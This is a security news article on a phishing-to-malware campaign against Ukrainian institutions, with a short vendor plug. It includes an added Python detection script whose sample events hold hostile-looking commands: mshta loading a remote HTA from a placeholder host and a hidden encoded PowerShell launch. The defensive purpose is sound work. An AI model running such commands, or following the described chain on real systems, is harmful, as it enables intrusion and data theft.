A newly uncovered cyber campaign attributed to the threat cluster UAC-0247 has drawn serious attention after targeting Ukrainian government bodies and healthcare institutions. The findings, disclosed by CERT-UA, reveal a multi-layered attack chain designed to infiltrate systems, establish persistence, and extract sensitive data from both browsers and communication platforms like WhatsApp.
The campaign was active between March and April 2026, and while attribution remains uncertain, the level of sophistication strongly indicates a well-resourced threat actor. The operation demonstrates a growing trend in cyber warfare where attackers combine social engineering, legitimate tools, and advanced malware to bypass traditional defenses.
Initial Access Through Social Engineering
The attack begins with a phishing email disguised as a humanitarian aid proposal. This tactic is particularly effective in high-stress environments, as it exploits urgency and trust.
Recipients are directed to a link that leads either to a compromised legitimate website or a convincingly crafted fake page generated with AI tools. In some cases, attackers leverage cross-site scripting vulnerabilities to inject malicious content into trusted domains, increasing the likelihood of user interaction.
Once the victim engages, they are prompted to download a Windows shortcut file (LNK), which acts as the entry point for the infection.
Execution Chain and Payload Deployment
Opening the LNK file triggers the execution of an HTA file via mshta.exe, a legitimate Windows utility frequently abused in malware campaigns. The HTA displays a decoy interface to distract the user while silently downloading additional payloads.
The next stage involves injecting shellcode into trusted processes such as RuntimeBroker.exe. Because the malicious code then runs inside a signed, normally present system process, its activity blends in with legitimate system behaviour, making detection significantly more difficult.
More advanced variants use a two-stage loader architecture, with the second stage built using a custom executable format. The payload is encrypted and compressed, further complicating forensic analysis.
Establishing Persistence and Remote Control
The attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection with a command-and-control server. This allows them to execute commands remotely using standard tools like cmd.exe.
In parallel, the malware family AGINGFLY is deployed. Written in C#, it communicates with attackers via WebSockets and enables a wide range of malicious actions, including command execution, file exfiltration, and keylogging.
A PowerShell component named SILENTLOOP enhances resilience by dynamically retrieving command-and-control infrastructure from Telegram channels. This ensures the malware remains operational even if primary servers are taken down.
Data Theft and Network Expansion
The primary objective of the campaign is data exfiltration. Attackers target credentials, browser cookies, and session data from Chromium-based browsers. They also deploy tools capable of extracting WhatsApp Web data, giving them access to private communications.
Additional tools support lateral movement, allowing attackers to expand their presence within compromised networks. Some deployments also include cryptocurrency mining modules, indicating a potential financial motive alongside intelligence gathering.
Why These Attacks Are Hard to Detect
The use of legitimate system utilities, encrypted payloads, and multi-stage execution makes this campaign particularly stealthy. Traditional security tools often struggle to differentiate between normal and malicious activity in such scenarios.
This is where platforms like IntelligenceX become essential. By offering visibility into exposed assets, malicious domains, and attacker infrastructure, IntelligenceX enables organizations to detect threats early in the attack lifecycle.
Security teams using IntelligenceX can monitor suspicious activity, analyze infrastructure patterns, and correlate threat intelligence across multiple sources.
Mitigation Strategies
Organizations should restrict execution of LNK, HTA, and script-based files, and limit the use of tools like mshta.exe and PowerShell. Continuous monitoring and user awareness training are also critical.
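The detection difficulty described above and the monitoring recommended here can be made concrete with a small hunting rule over Sysmon-style process telemetry. This is an added example, not code from CERT-UA or from the article; the event layout follows Sysmon (event 1 = ProcessCreate, 8 = CreateRemoteThread), and every event, path and URL in the sample is constructed, not an indicator from the report.

```python
# Added example: flag the LNK -> mshta.exe -> shellcode-injection chain in
# Sysmon-style process events. All sample data below is constructed.
from dataclasses import dataclass

@dataclass
class Event:
    event_id: int
    pid: int
    image: str                 # process performing the action
    parent_image: str = ""     # event 1 only
    command_line: str = ""     # event 1 only
    target_image: str = ""     # event 8 only: process receiving the remote thread

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
INJECTION_TARGETS = {"runtimebroker.exe"}   # trusted host named in the report

def base(path: str) -> str:
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, pid) for every event matching one of three defensive rules."""
    hits = []
    for e in events:
        img, parent, cmd = base(e.image), base(e.parent_image), e.command_line.lower()
        if e.event_id == 1 and img == "mshta.exe" and ("http" in cmd or ".hta" in cmd):
            hits.append(("mshta_remote_hta", e.pid))            # HTA opened via mshta.exe
        elif e.event_id == 1 and parent == "mshta.exe" and img in SHELLS:
            hits.append(("mshta_spawns_shell", e.pid))          # decoy HTA launching a shell
        elif e.event_id == 8 and base(e.target_image) in INJECTION_TARGETS \
                and img != base(e.target_image):
            hits.append(("remote_thread_into_trusted_host", e.pid))  # injection into RuntimeBroker
    return hits

# Constructed sample telemetry; the URL and encoded argument are placeholders.
SAMPLE = [
    Event(1, 4100, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          "mshta.exe https://placeholder.invalid/aid.hta"),
    Event(1, 4200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\mshta.exe", "powershell.exe -w hidden -enc <base64>"),
    Event(8, 4100, r"C:\Windows\System32\mshta.exe",
          target_image=r"C:\Windows\System32\RuntimeBroker.exe"),
    Event(1, 5000, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    Event(1, 5100, r"C:\Windows\System32\RuntimeBroker.exe", r"C:\Windows\System32\svchost.exe",
          "RuntimeBroker.exe -Embedding"),   # legitimate launch, produces no hit
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE):
        print(f"{rule}: pid {pid}")
```

Event 8 only observes thread-based injection; pair the last rule with Sysmon event 10 (ProcessAccess) on RuntimeBroker.exe to cover injection techniques that never create a remote thread.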
Conclusion
The UAC-0247 campaign highlights the evolving nature of cyber threats. Organizations must adopt proactive, intelligence-driven security strategies to defend against such sophisticated attacks.